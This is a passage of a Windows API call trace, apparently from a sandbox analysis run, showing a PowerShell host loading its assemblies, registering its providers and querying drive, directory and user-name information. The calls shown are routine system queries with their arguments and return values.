lpVolumeNameBuffer=0x3da658, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x2de820, lpMaximumComponentLength=0x2de81c, lpFileSystemFlags=0x2de818, lpFileSystemNameBuffer=0x3da558, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2de820*=0x705ba84c, lpMaximumComponentLength=0x2de81c*=0xff, lpFileSystemFlags=0x2de818*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0146.257] GetLastError () returned 0xcb [0146.257] SetErrorMode (uMode=0x1) returned 0x1 [0146.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.257] GetLastError () returned 0xcb [0146.257] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2de380, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.257] GetLastError () returned 0xcb [0146.257] SetErrorMode (uMode=0x1) returned 0x1 [0146.257] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34e19cc | out: lpFileInformation=0x34e19cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.257] GetLastError () returned 0xcb [0146.257] SetErrorMode (uMode=0x1) returned 0x1 [0146.257] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2de380, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.257] GetLastError () returned 0xcb [0146.257] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2de30c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.257] GetLastError () returned 0xcb [0146.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.257] GetLastError () returned 0xcb [0146.259] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2de2c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.259] GetLastError () returned 0xcb [0146.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.259] GetLastError () returned 0xcb [0146.260] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2de2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.260] GetLastError () returned 0xcb [0146.260] SetErrorMode (uMode=0x1) returned 0x1 [0146.260] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34e2624 | out: lpFileInformation=0x34e2624*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.260] GetLastError () returned 0xcb [0146.260] SetErrorMode (uMode=0x1) returned 0x1 [0146.260] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2de2d8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.260] GetLastError () returned 0xcb [0146.260] SetErrorMode (uMode=0x1) returned 0x1 [0146.260] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34e2774 | out: lpFileInformation=0x34e2774*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.260] GetLastError () returned 0xcb [0146.260] SetErrorMode (uMode=0x1) returned 0x1 [0146.261] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2de31c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.261] GetLastError () returned 0xcb [0146.261] SetErrorMode (uMode=0x1) returned 0x1 [0146.261] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34e2914 | out: lpFileInformation=0x34e2914*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.261] GetLastError () returned 0xcb [0146.261] SetErrorMode (uMode=0x1) returned 0x1 [0146.261] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de8a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de8a4) returned 0x1 [0146.261] GetLastError () returned 0xcb [0146.261] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de8ac | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de8ac) returned 1 [0146.262] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34e5648*="FileSystem", lpRawData=0x34e5504) returned 1 [0146.264] GetLastError () returned 0x0 [0146.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.265] GetLastError () returned 0xcb [0146.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.266] GetLastError () returned 0xcb [0146.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.266] GetLastError () returned 0xcb [0146.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.266] GetLastError () returned 0xcb [0146.266] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de8a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de8a4) returned 0x1 [0146.266] GetLastError () returned 0xcb [0146.266] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de8ac | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de8ac) returned 1 [0146.267] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34e96e4*="Function", lpRawData=0x34e95a0) returned 1 [0146.273] GetLastError () returned 0x0 [0146.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.275] GetLastError () returned 0xcb [0146.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.368] GetLastError () returned 0xcb [0146.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.368] GetLastError () returned 0xcb [0146.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.368] GetLastError () returned 0xcb [0146.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.368] GetLastError () returned 0xcb [0146.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.419] GetLastError () returned 0xcb [0146.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.419] GetLastError () returned 0xcb [0146.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de268, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.419] GetLastError () returned 0xcb [0146.421] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de8a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de8a4) returned 0x1 [0146.421] GetLastError () returned 0xcb [0146.421] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de8ac | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de8ac) returned 1 [0146.422] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x350274c*="Registry", lpRawData=0x3502608) returned 1 [0146.423] GetLastError () returned 0x0 [0146.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.424] GetLastError () returned 0x0 [0146.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.424] GetLastError () returned 0x0 [0146.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.424] GetLastError () returned 0x0 [0146.454] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de8a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de8a4) returned 0x1 [0146.454] GetLastError () returned 0x0 [0146.454] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de8ac | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de8ac) returned 1 [0146.454] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35064e0*="Variable", lpRawData=0x350639c) returned 1 [0146.494] GetLastError () returned 0x0 [0146.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.495] GetLastError () returned 0xcb [0146.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.497] GetLastError () returned 0xcb [0146.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2de2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0146.498] GetLastError () returned 0xcb [0146.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0146.498] GetLastError () returned 0xcb [0146.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0146.498] GetLastError () returned 0xcb [0146.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2de254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0146.498] GetLastError () returned 0xcb [0146.564] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de8a4 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de8a4) returned 0x1 [0146.564] GetLastError () returned 0x3 [0146.564] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de8ac | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de8ac) returned 1 [0146.565] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3514258*="Certificate", lpRawData=0x3514114) returned 1 [0146.590] GetLastError () returned 0x0 [0146.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.599] GetLastError () returned 0xcb [0146.604] GetLogicalDrives () returned 0x4 [0146.604] GetLastError () returned 0xcb [0146.604] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2de41c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.604] GetLastError () returned 0xcb [0146.604] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.604] GetLastError () returned 0xcb [0146.605] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3da558 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0146.605] GetLastError () returned 0xcb [0146.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.606] GetLastError () returned 0xcb [0146.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.607] GetLastError () returned 0xcb [0146.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.625] GetLastError () returned 0xcb [0146.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.650] GetLastError () returned 0xcb [0146.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de264, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.650] GetLastError () returned 0xcb [0146.650] SetErrorMode (uMode=0x1) returned 0x1 [0146.650] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x351b178 | out: lpFileInformation=0x351b178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.650] GetLastError () returned 0xcb [0146.650] SetErrorMode (uMode=0x1) returned 0x1 [0146.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de26c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.651] GetLastError () returned 0xcb [0146.651] SetErrorMode (uMode=0x1) returned 0x1 [0146.651] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x351b30c | out: lpFileInformation=0x351b30c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.651] GetLastError () returned 0xcb [0146.651] SetErrorMode (uMode=0x1) returned 0x1 [0146.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.655] GetLastError () returned 0xcb [0146.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.659] GetLastError () returned 0xcb [0146.660] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2de330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.660] GetLastError () returned 0xcb [0146.660] SetErrorMode (uMode=0x1) returned 0x1 [0146.660] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2de7b0 | out: lpFileInformation=0x2de7b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.660] GetLastError () returned 0xcb [0146.660] SetErrorMode (uMode=0x1) returned 0x1 [0146.660] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2de330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.660] GetLastError () returned 0xcb [0146.660] SetErrorMode (uMode=0x1) returned 0x1 [0146.660] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2de7b0 | out: lpFileInformation=0x2de7b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.660] GetLastError () returned 0xcb [0146.660] SetErrorMode (uMode=0x1) returned 0x1 [0146.660] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2de344, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.660] GetLastError () returned 0xcb [0146.660] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2de2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.660] GetLastError () returned 0xcb [0146.660] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x2de330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.660] GetLastError () returned 0xcb [0146.660] SetErrorMode (uMode=0x1) returned 0x1 [0146.660] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x2de7b0 | out: lpFileInformation=0x2de7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6cf5da00, ftLastAccessTime.dwHighDateTime=0x1d4ae93, ftLastWriteTime.dwLowDateTime=0x6cf5da00, ftLastWriteTime.dwHighDateTime=0x1d4ae93, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0146.660] GetLastError () returned 0xcb [0146.660] SetErrorMode (uMode=0x1) returned 0x1 [0146.660] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x2de330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.660] GetLastError () returned 0xcb [0146.661] SetErrorMode (uMode=0x1) returned 0x1 [0146.661] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x2de7b0 | out: lpFileInformation=0x2de7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6cf5da00, ftLastAccessTime.dwHighDateTime=0x1d4ae93, ftLastWriteTime.dwLowDateTime=0x6cf5da00, ftLastWriteTime.dwHighDateTime=0x1d4ae93, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0146.661] GetLastError () returned 0xcb [0146.661] SetErrorMode (uMode=0x1) returned 0x1 [0146.661] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x2de344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.661] GetLastError () returned 0xcb [0146.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x2de2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.661] GetLastError () returned 0xcb [0146.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.661] GetLastError () returned 0xcb [0146.661] SetErrorMode (uMode=0x1) returned 0x1 [0146.661] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2de7b0 | out: lpFileInformation=0x2de7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.661] GetLastError () returned 0xcb [0146.661] SetErrorMode (uMode=0x1) returned 0x1 [0146.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.661] GetLastError () returned 0xcb [0146.661] SetErrorMode (uMode=0x1) returned 0x1 [0146.661] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2de7b0 | out: lpFileInformation=0x2de7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.661] GetLastError () returned 0xcb [0146.661] SetErrorMode (uMode=0x1) returned 0x1 [0146.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de344, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.661] GetLastError () returned 0xcb [0146.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x2de2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.661] GetLastError () returned 0xcb [0146.662] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x2de33c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.662] GetLastError () returned 0xcb [0146.662] SetErrorMode (uMode=0x1) returned 0x1 [0146.662] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: 